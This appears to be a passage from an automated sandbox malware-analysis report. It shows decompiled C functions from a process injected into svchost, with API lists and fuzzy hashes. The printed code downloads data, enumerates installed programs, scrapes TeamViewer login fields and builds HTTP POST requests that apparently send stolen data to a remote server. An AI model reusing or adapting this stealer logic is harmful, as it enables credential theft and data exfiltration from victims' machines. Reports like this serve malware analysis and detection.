                                                                                                                                        			E02441AB0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
				void* _v8;
				void* _v12;
				long _v16;
				signed int _v20;
				void _v24;
				signed short _v28;
				void _v32;
				void* _v36;
				long _v40;
				long _v44;
				int _v48;
				DWORD* _v52;
				char* _v56;
				intOrPtr _v68;
				char* _v72;
				signed short _v92;
				intOrPtr _v96;
				char* _v100;
				long _v104;
				void* _v116;
				char _v376;
				char _v636;
				int _t77;
				void* _t78;
				void* _t80;
				int _t94;

				_v56 = "*/*";
				_v52 = 0;
				E024414A0( &_v116, 0, 0x3c);
				_v116 = 0x3c;
				_v100 =  &_v376;
				_v96 = 0x104;
				_v72 =  &_v636;
				_v68 = 0x104;
				_t77 = InternetCrackUrlA(_a4, 0, 0,  &_v116); // executed
				if(_t77 != 0) {
					if(_v104 == 0) {
						_v104 = 3;
					}
					if(_v104 == 3 || _v104 == 4) {
						_t78 = E02441EA0(); // executed
						_v36 = _t78;
						if(_v36 != 0) {
							_v28 = _v92;
							_v20 = 0x84080100;
							if(_v104 == 4) {
								_v20 = _v20 | 0x00803000;
							}
							_t80 = InternetConnectA(_v36,  &_v376, _v28 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
							_v12 = _t80;
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "GET",  &_v636, 0, 0,  &_v56, _v20, 1);
								if(_v8 != 0) {
									if(_v104 == 4) {
										_v44 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v44);
										_v24 = _v24 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
									}
									HttpSendRequestA(_v8, 0, 0, 0, 0);
									_v32 = 0;
									_v40 = 4;
									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v40, 0);
									if(_v32 != 0xc8 || _a8 == 0) {
										L26:
										InternetCloseHandle(_v8); // executed
										InternetCloseHandle(_v12);
										if(_v32 != 0xc8) {
											return 0;
										}
										return 1;
									} else {
										 *_a16 = 0;
										while(1 != 0) {
											_t94 = InternetReadFile(_v8, _a8, _a12,  &_v16); // executed
											_v48 = _t94;
											if(_v48 != 1 || _v16 <= 0) {
												goto L26;
											} else {
												_a8 = _a8 + _v16;
												_a12 = _a12 - _v16;
												 *_a16 =  *_a16 + _v16;
												continue;
											}
										}
										goto L26;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}





























                                                                                                                                        0x02441ab9
                                                                                                                                        0x02441ac0
                                                                                                                                        0x02441acf
                                                                                                                                        0x02441ad7
                                                                                                                                        0x02441ae4
                                                                                                                                        0x02441ae7
                                                                                                                                        0x02441af4
                                                                                                                                        0x02441af7
                                                                                                                                        0x02441b0a
                                                                                                                                        0x02441b12
                                                                                                                                        0x02441b1f
                                                                                                                                        0x02441b21
                                                                                                                                        0x02441b21
                                                                                                                                        0x02441b2c
                                                                                                                                        0x02441b3b
                                                                                                                                        0x02441b40
                                                                                                                                        0x02441b47
                                                                                                                                        0x02441b54
                                                                                                                                        0x02441b58
                                                                                                                                        0x02441b63
                                                                                                                                        0x02441b6d
                                                                                                                                        0x02441b6d
                                                                                                                                        0x02441b8a
                                                                                                                                        0x02441b90
                                                                                                                                        0x02441b97
                                                                                                                                        0x02441bc4
                                                                                                                                        0x02441bcb
                                                                                                                                        0x02441be2
                                                                                                                                        0x02441be4
                                                                                                                                        0x02441bf9
                                                                                                                                        0x02441c07
                                                                                                                                        0x02441c16
                                                                                                                                        0x02441c16
                                                                                                                                        0x02441c28
                                                                                                                                        0x02441c2e
                                                                                                                                        0x02441c35
                                                                                                                                        0x02441c4f
                                                                                                                                        0x02441c5c
                                                                                                                                        0x02441cc0
                                                                                                                                        0x02441cc4
                                                                                                                                        0x02441cce
                                                                                                                                        0x02441cdb
                                                                                                                                        0x00000000
                                                                                                                                        0x02441ce4
                                                                                                                                        0x00000000
                                                                                                                                        0x02441c64
                                                                                                                                        0x02441c67
                                                                                                                                        0x02441c6d
                                                                                                                                        0x02441c86
                                                                                                                                        0x02441c8c
                                                                                                                                        0x02441c93
                                                                                                                                        0x00000000
                                                                                                                                        0x02441c9b
                                                                                                                                        0x02441ca1
                                                                                                                                        0x02441caa
                                                                                                                                        0x02441cb8
                                                                                                                                        0x00000000
                                                                                                                                        0x02441cbe
                                                                                                                                        0x02441c93
                                                                                                                                        0x00000000
                                                                                                                                        0x02441c6d
                                                                                                                                        0x02441c5c
                                                                                                                                        0x02441bd1
                                                                                                                                        0x00000000
                                                                                                                                        0x02441b99
                                                                                                                                        0x00000000
                                                                                                                                        0x02441b99
                                                                                                                                        0x02441b97
                                                                                                                                        0x00000000
                                                                                                                                        0x02441b34
                                                                                                                                        0x00000000
                                                                                                                                        0x02441b34
                                                                                                                                        0x02441b2c
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • InternetCrackUrlA.WININET(00000020,00000000,00000000,0000003C), ref: 02441B0A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet
                                                                                                                                        • String ID: */*$<$GET
                                                                                                                                        • API String ID: 1381609488-4180448669
                                                                                                                                        • Opcode ID: 684ee62394becf589aa6934e47f279506a5695f94c59b23791e841dd1c699cce
                                                                                                                                        • Instruction ID: f42a422ae97422749960feebd0d92a5d8cebef12a3031aa3fcdca2a4aeab6e93
                                                                                                                                        • Opcode Fuzzy Hash: 684ee62394becf589aa6934e47f279506a5695f94c59b23791e841dd1c699cce
                                                                                                                                        • Instruction Fuzzy Hash: 50710AB5D40209EBEB14CFE4CD49BEEB7B4BB48704F10451AE619AB280DB749A94CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10002074, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172registrystringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                        			E10002074(void* __ebx, int* __ecx, void* __edx) {
				void* _v8;
				char _v4104;
				int _v4108;
				int _v4112;
				char _v4116;
				char _v4120;
				int _v4124;
				void* _v4128;
				intOrPtr _v4132;
				void* __ebp;
				long _t56;
				void** _t60;
				void* _t61;
				void* _t71;
				long _t76;
				void* _t80;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t102;
				void* _t107;
				int* _t108;
				void* _t112;
				void* _t115;
				void* _t120;

				_t111 = __edx;
				_t108 = __ecx;
				_t107 = __ebx;
				if( *0x1000f0dd != 0) {
					E10001871( *0x1000f0dd);
					 *0x1000f0dd = 0;
				}
				if( *0x1000f0e1 != 0) {
					E10001871( *0x1000f0e1);
					 *0x1000f0e1 = 0;
				}
				E10001000( &_v4116, _t108, _t111,  &_v4116); // executed
				E10001000( &_v4120, _t108, _t111,  &_v4120);
				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
				if(_t56 != 0) {
					L19:
					E10001522(_v4116, 0);
					E10001522(_v4120, 0);
					_t60 =  &_v4128;
					_push(_t60);
					_push(_v4116);
					L1000BA64();
					if(_t60 >= 0) {
						_v4124 = E10001091(_t60, _t107, _t111, _v4116);
						 *0x1000f0dd = E10001888(_v4124);
						_t71 = GlobalLock(_v4128);
						if(_t71 != 0) {
							_t115 =  *0x1000f0dd; // 0x2874ff8
							memcpy(_t115, _t71, _v4124);
							_t120 = _t120 + 0xc;
							_t108 = 0;
							GlobalUnlock(_v4128);
						}
					}
					_t61 =  &_v4128;
					_push(_t61);
					_push(_v4120);
					L1000BA64();
					if(_t61 >= 0) {
						_v4124 = E10001091(_t61, _t107, _t111, _v4120);
						 *0x1000f0e1 = E10001888(_v4124);
						_t61 = GlobalLock(_v4128);
						if(_t61 != 0) {
							_t112 =  *0x1000f0e1; // 0x286d9a8
							memcpy(_t112, _t61, _v4124);
							_t108 = 0;
							_t61 = GlobalUnlock(_v4128);
						}
					}
					return E10001026(E10001026(_t61, _t107, _t108, _t111, _v4116), _t107, _t108, _t111, _v4120);
				}
				_v4112 = 0;
				while(1) {
					_v4108 = 0xfff;
					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
					if(_t76 != 0) {
						break;
					}
					_t80 = E10001DB1("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
					if(_t80 != 0) {
						_t111 = _t80;
						_t83 = E10001E05(_t80,  &_v4104);
						if(_t83 != 0) {
							_v4132 = _t83;
							_t85 = E10001D2A(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
							_t86 = _t85;
							if(_t86 != 0 && _t86 > 1) {
								_push(_t86);
								E10001537(_v4116, _t86, _v4124);
								_t90 = E10001D2A(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
								_t91 = _t90;
								if(_t91 == 0 || _v4124 <= 1) {
									E10001537(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
								} else {
									_push(_t91);
									E10001537(_v4120,  &_v4104, lstrlenA( &_v4104));
									_t102 = _t91;
									E10001537(_v4120, _t102, _v4124);
									E10001871();
								}
								E10001871();
							}
							E10001871(_v4132);
						}
					}
					_v4112 = _v4112 + 1;
				}
				RegCloseKey(_v8); // executed
				goto L19;
			}






























                                                                                                                                        0x10002074
                                                                                                                                        0x10002074
                                                                                                                                        0x10002074
                                                                                                                                        0x10002086
                                                                                                                                        0x1000208e
                                                                                                                                        0x10002093
                                                                                                                                        0x10002093
                                                                                                                                        0x100020a4
                                                                                                                                        0x100020ac
                                                                                                                                        0x100020b1
                                                                                                                                        0x100020b1
                                                                                                                                        0x100020c2
                                                                                                                                        0x100020ce
                                                                                                                                        0x100020e1
                                                                                                                                        0x100020e8
                                                                                                                                        0x10002249
                                                                                                                                        0x10002251
                                                                                                                                        0x1000225e
                                                                                                                                        0x10002263
                                                                                                                                        0x10002269
                                                                                                                                        0x1000226a
                                                                                                                                        0x10002270
                                                                                                                                        0x10002277
                                                                                                                                        0x10002284
                                                                                                                                        0x10002295
                                                                                                                                        0x100022a5
                                                                                                                                        0x100022a7
                                                                                                                                        0x100022b1
                                                                                                                                        0x100022b7
                                                                                                                                        0x100022b7
                                                                                                                                        0x100022b7
                                                                                                                                        0x100022bf
                                                                                                                                        0x100022bf
                                                                                                                                        0x100022a7
                                                                                                                                        0x100022c4
                                                                                                                                        0x100022ca
                                                                                                                                        0x100022cb
                                                                                                                                        0x100022d1
                                                                                                                                        0x100022d8
                                                                                                                                        0x100022e5
                                                                                                                                        0x100022f6
                                                                                                                                        0x10002306
                                                                                                                                        0x10002308
                                                                                                                                        0x10002312
                                                                                                                                        0x10002318
                                                                                                                                        0x10002318
                                                                                                                                        0x10002320
                                                                                                                                        0x10002320
                                                                                                                                        0x10002308
                                                                                                                                        0x1000233e
                                                                                                                                        0x1000233e
                                                                                                                                        0x100020ee
                                                                                                                                        0x100020f8
                                                                                                                                        0x100020f8
                                                                                                                                        0x10002121
                                                                                                                                        0x10002128
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000213d
                                                                                                                                        0x1000213f
                                                                                                                                        0x10002145
                                                                                                                                        0x10002154
                                                                                                                                        0x10002156
                                                                                                                                        0x1000215c
                                                                                                                                        0x10002179
                                                                                                                                        0x1000217e
                                                                                                                                        0x10002180
                                                                                                                                        0x1000218f
                                                                                                                                        0x1000219d
                                                                                                                                        0x100021b9
                                                                                                                                        0x100021be
                                                                                                                                        0x100021c0
                                                                                                                                        0x10002221
                                                                                                                                        0x100021cb
                                                                                                                                        0x100021cb
                                                                                                                                        0x100021e7
                                                                                                                                        0x100021ec
                                                                                                                                        0x100021fa
                                                                                                                                        0x100021ff
                                                                                                                                        0x100021ff
                                                                                                                                        0x10002226
                                                                                                                                        0x10002226
                                                                                                                                        0x10002231
                                                                                                                                        0x10002231
                                                                                                                                        0x10002156
                                                                                                                                        0x10002236
                                                                                                                                        0x10002236
                                                                                                                                        0x10002244
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 100020E1
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 10002121
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 100021D4
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 1000220D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 10002244
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 10002270
                                                                                                                                        • GlobalLock.KERNEL32 ref: 100022A0
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?), ref: 100022BF
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 100022D1
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10002301
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10002320
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                                                                                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                        • API String ID: 4234118056-981893429
                                                                                                                                        • Opcode ID: 886ac1c5b7089cb042fa2ad9ff482cc2f72178973f07270dfac66da2e0bb7df9
                                                                                                                                        • Instruction ID: da10a617b2e8e93210762bf69878d03a319c025929bf0975a5fdd943acd04647
                                                                                                                                        • Opcode Fuzzy Hash: 886ac1c5b7089cb042fa2ad9ff482cc2f72178973f07270dfac66da2e0bb7df9
                                                                                                                                        • Instruction Fuzzy Hash: 7D611075C00168BAFB31DB60CC45BED7679EB043C0F1044E5B689A106ADBB5AFD4AF61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.15%

                                                                                                                                        Function 100099A4, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 153windowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E100099A4(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				struct HWND__* _v20;
				CHAR* _v24;
				long _v28;
				long _v32;
				intOrPtr _v36;
				struct HWND__* _t59;
				struct HWND__* _t60;
				struct HWND__* _t66;
				struct HWND__* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				int _t71;
				CHAR* _t73;
				char* _t74;
				long _t79;
				long _t84;
				struct HWND__* _t90;
				long _t92;
				void* _t96;
				void* _t97;
				void* _t98;

				_t98 = __edx;
				_t97 = __ecx;
				_t96 = __ebx;
				_v8 = E100015A9(_a4, 0x86, 0);
				_v28 = E10001888(0x40);
				_v32 = E10001888(0x40);
				_v24 = E10001888(0x40);
				_t59 = FindWindowExA(0, 0, 0, "TeamViewer"); // executed
				_t60 = _t59;
				if(_t60 == 0) {
					L15:
					E100015EF(_t96, _t97, _t98, _t104, _a4, _v8);
					E10001871(_v28);
					E10001871(_v32);
					return E10001871(_v24);
				}
				_v12 = _t60;
				_v16 = 0;
				_v20 = 0;
				_t66 = FindWindowExA(_v12, _v16, 0x8002, 0);
				if(_t66 == 0) {
					goto L15;
				}
				_v16 = _t66;
				_t68 = FindWindowExA(_v16, _v20, "Edit", 0);
				if(_t68 == 0) {
					_t69 = FindWindowExA(_v16, 0, 0, 0);
					while(1) {
						_t70 = _t69;
						__eflags = _t70;
						if(__eflags == 0) {
							goto L15;
						}
						_v12 = _t70;
						_t71 = GetClassNameA(_t70, _v24, 0x40);
						__eflags = _t71;
						if(_t71 == 0) {
							L13:
							_t69 = FindWindowExA(_v16, _v12, 0, 0);
							continue;
						}
						_t73 = _v24;
						__eflags =  *_t73 - 0x41;
						if( *_t73 != 0x41) {
							goto L13;
						}
						_t74 =  &(_t73[1]);
						__eflags =  *_t74 - 0x54;
						if( *_t74 != 0x54) {
							goto L13;
						}
						__eflags = _t74[1] - 0x4c;
						if(_t74[1] != 0x4c) {
							goto L13;
						}
						SendMessageW(_v12, 0xd, 0x40, _v28);
						_push(E10002A83(_v28));
						E10001871(_v28);
						_pop(_t79);
						_v28 = _t79;
						SendMessageW(FindWindowExA(_v16, _v12, 0, 0), 0xd, 0x40, _v32);
						_push(E10002A83(_v32));
						E10001871(_v32);
						_pop(_t84);
						_v32 = _t84;
						E10001522(_a4, 0xbeef0000);
						E10001584(_a4, _v28);
						E10001584(_a4, _v32);
						goto L15;
					}
					goto L15;
				}
				_v20 = _t68;
				SendMessageA(_v20, 0xd, 0x40, _v28);
				_t90 = FindWindowExA(_v16, _v20, "Edit", 0);
				if(_t90 != 0) {
					_v20 = _t90;
					_t92 = SendMessageA(_v20, 0xd, 0x40, _v32);
					_t104 = _t92;
					if(_t92 != 0) {
						_v36 = _t92;
						E10001522(_a4, 0xbeef0000);
						E10001584(_a4, _v28);
						E10001584(_a4, _v32);
					}
				}
				goto L15;
			}



























                                                                                                                                        0x100099a4
                                                                                                                                        0x100099a4
                                                                                                                                        0x100099a4
                                                                                                                                        0x100099b9
                                                                                                                                        0x100099c3
                                                                                                                                        0x100099cd
                                                                                                                                        0x100099d7
                                                                                                                                        0x100099e5
                                                                                                                                        0x100099ea
                                                                                                                                        0x100099ec
                                                                                                                                        0x10009b75
                                                                                                                                        0x10009b7b
                                                                                                                                        0x10009b83
                                                                                                                                        0x10009b8b
                                                                                                                                        0x10009b99
                                                                                                                                        0x10009b99
                                                                                                                                        0x100099f2
                                                                                                                                        0x100099f5
                                                                                                                                        0x100099fc
                                                                                                                                        0x10009a15
                                                                                                                                        0x10009a17
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009a1d
                                                                                                                                        0x10009a32
                                                                                                                                        0x10009a34
                                                                                                                                        0x10009aa8
                                                                                                                                        0x10009b6d
                                                                                                                                        0x10009b6d
                                                                                                                                        0x10009b6d
                                                                                                                                        0x10009b6f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009ab2
                                                                                                                                        0x10009abb
                                                                                                                                        0x10009ac0
                                                                                                                                        0x10009ac2
                                                                                                                                        0x10009b5e
                                                                                                                                        0x10009b68
                                                                                                                                        0x00000000
                                                                                                                                        0x10009b68
                                                                                                                                        0x10009ac8
                                                                                                                                        0x10009acb
                                                                                                                                        0x10009ace
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009ad4
                                                                                                                                        0x10009ad5
                                                                                                                                        0x10009ad8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009adf
                                                                                                                                        0x10009ae2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009aee
                                                                                                                                        0x10009afb
                                                                                                                                        0x10009aff
                                                                                                                                        0x10009b04
                                                                                                                                        0x10009b05
                                                                                                                                        0x10009b1f
                                                                                                                                        0x10009b2c
                                                                                                                                        0x10009b30
                                                                                                                                        0x10009b35
                                                                                                                                        0x10009b36
                                                                                                                                        0x10009b41
                                                                                                                                        0x10009b4c
                                                                                                                                        0x10009b57
                                                                                                                                        0x00000000
                                                                                                                                        0x10009b57
                                                                                                                                        0x00000000
                                                                                                                                        0x10009b6d
                                                                                                                                        0x10009a36
                                                                                                                                        0x10009a43
                                                                                                                                        0x10009a5a
                                                                                                                                        0x10009a5c
                                                                                                                                        0x10009a5e
                                                                                                                                        0x10009a70
                                                                                                                                        0x10009a70
                                                                                                                                        0x10009a72
                                                                                                                                        0x10009a74
                                                                                                                                        0x10009a7f
                                                                                                                                        0x10009a8a
                                                                                                                                        0x10009a95
                                                                                                                                        0x10009a95
                                                                                                                                        0x10009a72
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,00000000,TeamViewer), ref: 100099E5
                                                                                                                                        • FindWindowExA.USER32(?,00000000,00008002,00000000), ref: 10009A10
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 10009A2D
                                                                                                                                        • SendMessageA.USER32 ref: 10009A43
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,Edit,00000000), ref: 10009A55
                                                                                                                                        • SendMessageA.USER32 ref: 10009A6B
                                                                                                                                        • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 10009AA8
                                                                                                                                        • GetClassNameA.USER32(00000000,?,00000040), ref: 10009ABB
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000040,?), ref: 10009AEE
                                                                                                                                        • FindWindowExA.USER32(00000000,?,00000000,00000000), ref: 10009B12
                                                                                                                                        • SendMessageW.USER32(00000000,0000000D,00000040,?), ref: 10009B1F
                                                                                                                                          • Part of subcall function 10001584: lstrlenA.KERNEL32(00000000), ref: 10001590
                                                                                                                                        • FindWindowExA.USER32(00000000,?,00000000,00000000), ref: 10009B68
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindWindow$MessageSend$AllocClassLocalNamelstrlen
                                                                                                                                        • String ID: Edit$TeamViewer
                                                                                                                                        • API String ID: 1708697226-3332912978
                                                                                                                                        • Opcode ID: 395d9a5a059a4bc752a0990df65af44e1995dfd89007fe728a1d32d8135ea389
                                                                                                                                        • Instruction ID: 544705a3d7d72aa0db6f0d79ba887ddae767a57c35775b498c5cf11cc881283f
                                                                                                                                        • Opcode Fuzzy Hash: 395d9a5a059a4bc752a0990df65af44e1995dfd89007fe728a1d32d8135ea389
                                                                                                                                        • Instruction Fuzzy Hash: B851D875E4060ABAFF129FA0DC03FEDBE72EF01780F104021B614790E9DB76AA519B55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.11%

                                                                                                                                        Function 10003D48, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 150networkstringUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 386 10003d48-10003dcf call 10001888 * 4 InternetCrackUrlA 395 10003dd1-10003dd5 386->395 396 10003dd7 386->396 395->396 397 10003ddc-10003dfa InternetCreateUrlA 395->397 398 10003f0d-10003f28 call 10001871 * 4 396->398 399 10003e01-10003e40 InternetCrackUrlA 397->399 400 10003dfc 397->400 416 10003f2d-10003f32 398->416 403 10003e42-10003e46 399->403 404 10003e48 399->404 400->398 403->404 406 10003e4d-10003e5d ObtainUserAgentString 403->406 404->398 408 10003e7d-10003e98 wsprintfA 406->408 409 10003e5f-10003e7b wsprintfA 406->409 411 10003e9b-10003eac call 1000391d 408->411 409->411 417 10003eb0-10003ed1 call 10003d1a lstrlenA call 100039a1 411->417 418 10003eae 411->418 423 10003ed3 417->423 424 10003ed5-10003ed9 417->424 418->398 425 10003f05-10003f08 closesocket 423->425 426 10003edb-10003ee4 call 100039a1 424->426 427 10003eef-10003ef3 424->427 425->398 430 10003ee9-10003eeb 426->430 427->425 429 10003ef5-10003efe call 10003b95 427->429 433 10003f03 429->433 430->427 432 10003eed 430->432 432->425 433->425
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E10003D48(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v16;
				void* _v20;
				signed int _v40;
				long _v44;
				int _v48;
				void* _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char* _v76;
				int _v80;
				long _v84;
				intOrPtr _v88;
				char _v92;
				int _t79;
				int _t85;
				int _t87;
				int _t90;
				int _t91;
				int _t94;
				int _t95;
				int _t96;
				int _t97;
				int _t99;
				void* _t105;

				_t105 = __edx;
				_t99 = 0;
				_v68 = E10001888(0x1000);
				_v76 = E10001888(0x1000);
				_v72 = E10001888(0x1000);
				_v88 = E10001888(0x1000);
				_v92 = 0x1000;
				memset( &_v64, 0, 0x3c << 0);
				_v64 = 0x3c;
				_push(_v68);
				_pop( *_t10);
				_push(_v76);
				_pop( *_t12);
				_v44 = 0xfff;
				_v16 = 0xfff;
				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
				} else {
					_v84 = 0xfff;
					_t79 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
					__eflags = _t79;
					if(_t79 != 0) {
						 *_v76 = 0;
						memset( &_v64, 0, 0x3c << 0);
						_v64 = 0x3c;
						_push(_v76);
						_pop( *_t27);
						_v44 = 0xfff;
						_v16 = 0xfff;
						_t85 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
						__eflags = _t85;
						if(_t85 == 0) {
							L7:
							L21:
							E10001871(_v68);
							E10001871(_v72);
							E10001871(_v76);
							E10001871(_v88); // executed
							return _t99;
						}
						__eflags = _v48;
						if(_v48 != 0) {
							_t87 =  &_v92;
							_push(_t87);
							_push(_v88);
							_push(0); // executed
							L1000BA4C(); // executed
							__eflags = _t87;
							if(_t87 < 0) {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
							} else {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v88);
							}
							_t90 = E1000391D(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff); // executed
							_t91 = _t90;
							__eflags = _t91;
							if(_t91 != 0) {
								_v80 = _t91;
								E10003D1A(_v80); // executed
								_t94 = E100039A1(_v80, _v72, lstrlenA(_v72)); // executed
								_t95 = _t94;
								__eflags = _t95;
								if(_t95 != 0) {
									__eflags = _a12;
									if(_a12 == 0) {
										L18:
										_t99 = _t95;
										__eflags = _t99;
										if(__eflags != 0) {
											_t96 = E10003B95(0, _t105, __eflags, _v80, _a16, _a20); // executed
											_t99 = _t96;
										}
										L20:
										_push(_v80);
										L1000B8EA(); // executed
										goto L21;
									}
									_t97 = E100039A1(_v80, _a8, _a12); // executed
									_t95 = _t97;
									__eflags = _t95;
									if(_t95 != 0) {
										goto L18;
									}
									goto L20;
								}
								goto L20;
							} else {
								goto L21;
							}
						}
						goto L7;
					}
				}
			}



























                                                                                                                                        0x10003d48
                                                                                                                                        0x10003d50
                                                                                                                                        0x10003d5c
                                                                                                                                        0x10003d69
                                                                                                                                        0x10003d76
                                                                                                                                        0x10003d83
                                                                                                                                        0x10003d86
                                                                                                                                        0x10003d97
                                                                                                                                        0x10003d99
                                                                                                                                        0x10003da0
                                                                                                                                        0x10003da3
                                                                                                                                        0x10003da6
                                                                                                                                        0x10003da9
                                                                                                                                        0x10003dac
                                                                                                                                        0x10003db3
                                                                                                                                        0x10003dcf
                                                                                                                                        0x10003ddc
                                                                                                                                        0x10003ddc
                                                                                                                                        0x10003df3
                                                                                                                                        0x10003df8
                                                                                                                                        0x10003dfa
                                                                                                                                        0x10003e04
                                                                                                                                        0x10003e11
                                                                                                                                        0x10003e13
                                                                                                                                        0x10003e1a
                                                                                                                                        0x10003e1d
                                                                                                                                        0x10003e20
                                                                                                                                        0x10003e27
